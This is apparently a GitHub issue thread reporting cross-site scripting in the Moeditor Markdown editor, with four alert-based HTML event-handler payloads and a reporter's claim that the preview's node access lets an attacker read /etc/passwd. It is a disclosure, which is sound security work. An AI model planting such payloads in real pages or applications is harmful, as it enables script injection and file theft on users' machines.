### ISSUE TITLE
XSS

### ISSUE THREAD

**Issue by EbXpJ6bp** [Moeditor/Moeditor#113]
Hi
I found 4 types of XSS. 

```
<a onmouseover="alert(123)">XSS</a> <a onmouseover=alert(123)>XSS</a>
<iframe src=# onmouseover="alert(123)"></iframe>
<img src="http://www.example.com/>"onerror="alert(123)//<">
<SELECT NAME="" onmouseover=alert(123)></select>
```

**Comment by Menci** [comment]
Does it matter anything?

**Comment by EbXpJ6bp** [comment]
![test](https://cloud.githubusercontent.com/assets/8474118/20646703/e22e249c-b4c3-11e6-838c-02a56bd0159b.gif)

![test win](https://cloud.githubusercontent.com/assets/8474118/20646729/7cffa28e-b4c4-11e6-8703-61b1e95fcd5b.gif)

Attacker can get `/etc/passwd` and post. and more more

**Comment by EbXpJ6bp** [comment]
I was sorry it was too much thought

**Comment by Menci** [comment]
Maybe I should disable node in the preview.
